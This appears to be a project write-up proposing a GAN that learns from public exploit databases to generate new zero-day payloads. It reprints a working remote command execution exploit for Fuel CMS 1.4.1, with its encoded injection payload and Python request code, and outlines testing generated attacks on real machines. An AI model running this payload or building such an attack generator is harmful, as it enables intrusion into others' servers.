Is it possible for the AI (GAN Generative Adversarial Network) to generate exploit hack codes automatically?
I have been doing the courses https://tryhackme.com/ They are good, I recommend them, but you are not going to hack any real environment with it. (Nobody will going to enter any website where the system's workers know how to press the update button). We have extensive experience with neural networks.
To hack real environments you need to find a zero-day exploit, you can obtain:
- Through a honeypot: create a vulnerable artificial environment and have a MASTER hacker appear, attack you, collect the attack code there, and take day 0)
- Know a lot and fabricate the vulnerability (Everybody will die doing reverse engineering at a low level, before finding it)
Can you feed a TensorFlow GAN with known previous exploit codes and have the GAN end up generating day 0 exploits?
Note: In this project the word AI will not be used again, it is a marketing word, when programming IT MEANS NOTHING, every time a programmer says AI instead of Reinforcement Learning, Tensor Flow,pytorch o Decision Tree, a kitten dies XD
Una GAN (Deep Convolutional Generative Adversarial Network) Two models are trained simultaneously by an adversarial process. Generator ("the artist") learns to create images that look real, while Discriminator ("the art critic") learns to differentiate real images from fake ones. More info: https://www.tensorflow.org/tutorials/generative/dcgan
Example of how the GAN is fed with anime faces (an image matrix 360 width, 360 length, 3 colors) why not an n x n dimensional exploit matrix? and after several turns it ends up generating images of “invented” animes, that is, those that have not been made by any human.
For more details on GAN technologyExample of creation images of a hybrid animal between: horses and zebras
Remember that although the examples are with images, an image (an image matrix 360 width, 360 length, 3 colors) and a python code (a tokenized matrix N tokens, for N code files) for the GAN is the same a data array. It is true that to take the form of a GAN-matrix, an image has a different treatment than a text in German and a python code. Reinforcement Learning could also do it, but it does not reach the creativity levels of the GAN.
It is a code or set of codes that allows you to take advantage of an “extra function” of the attacked server. Attacked server is not aware that this extra function was randomly created during the development of the server.
Here we can see a good example of exploit https://www.exploit-db.com/exploits/50477 On servers with the Fuel CMS v1.4.1 library https://www.getfuelcms.com/
- If a search request is made http.serveratack.com/fuel/pages/select/?filter
- The payload is added behind
%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b %24%61%28%27
- After the payload a cmd command console code, for example simply list the files on the server
dir /l
- It ends with the concatenation of the payload
%27%29%2b%27
, the server will return the list of files, and any other cmd instructions, the machine is totally hacked.
The python code looks like this:
cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET\_ALL)
main\_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
r = requests.get(main\_url)
From this explanation and this link https://www.exploit-db.com/exploits/50477 The Sweet is the Payload, the rest of the code is auxiliary python, in fact it is perfectly executable in java or c#. The main idea is create a GAN to find Payloads.
To create AI images of horses that look like zebras we need a large dataset of images of zebras and horses.
To create the payload you need to collect all the python exploits (in the first versions only python will be used, keep in mind that the languages will be expanded). 98% of known exploits are found on these sites:
- https://www.exploit-db.com/ OWASP exploit database It represents a broad consensus about the most critical security risks to web application
- https://nvd.nist.gov/vuln/full-listing USA National Vulnerability Database
- https://www.tenable.com/products/nessus Free or pay version
- https://www.rapid7.com/db Vulnerability & Exploit Database (use in Metasploit https://docs.rapid7.com/metasploit/managing-the-database/ )
- https://github.com/ can search GitHub by keywords such as “POC”, “vulnerability” key “cve”
For the python exploit codes to enter the GAN, tokenization (matrix transformation) is required. Each language requires its own tokenization system, English, French... (more information on what tokenization is https://www.tensorflow.org/text/guide/tokenizers )
You can play tokenizing like chatGPT does herehttps://platform.openai.com/tokenizer
In the case of programming languages, their own tokenization mode is required. To carry out this process there are libraries and articles can help Tokenizer for Python source:
- https://benjam.info/blog/posts/2019-09-18-python-deep-dive-tokenizer/ entire reading is recommended
- https://docs.python.org/3/library/tokenize.html https://documentation.help/Python-3.6.8/tokenize.html
- https://pypi.org/project/code-tokenize/
- https://github.com/huggingface/tokenizers/tree/main?tab=readme-ov-file#bindings
Generator ("the artist") must generate .py codes and correct them based on the weight returned by the Discriminator ("the art critic") The Discriminator should answer the question, how close is it to being a viable payload?
To really check it, a real machine would be required to attack, this environment is complex, generating about +-5000 .py with potential attacks is enough. Those have to be checked with the real machine. The Discriminator must be able to verify that the code compiles and is able to reach the target. Training should focus on creating payloads. It would help a lot to understand the steps that the programmer-hacker took to discover the exploit.
*feel free to comment changes *
- Collect .py from DDBB exploits
- Inside the .py tokenize , one thing is the code and another the payload. each one has to have its own way to become matrix.
- Generation of two Discriminator (art critics) these neural networks must answer the question, how close is this .py to being a viable code? and another one that answers, how close is this payload to being a viable payload? High importance to what kind of payload is https://portswigger.net/burp/documentation/desktop/tools/intruder/configure-attack/payload-types
- Creation of the Generator (the artist) should generate code and randomly weighted payload with the Distriminator (like anime images but with code).
- Evaluation, creation of real virtualized environments for testing the generated payloads. This tool will generate around 100000 payloads of which only one will work. The one that works XD
We are currently developing privately, if you want to join the team please contact us. https://www.linkedin.com/in/luislcastillo/
The name is a curious tribute to Argentina 🇦🇷 🌞. Sue Carpenter is the nurse who took Diego Maradona off the field in the 1994 USA soccer World Cup⚽ (stadio Foxboro de Massachusetts, June 25, Argentina beat Nigeria 2-1). Sue was the only person who could stop Diego, no other soccer player in history could stop him. “the tool that kills God soccer”. After that he never played again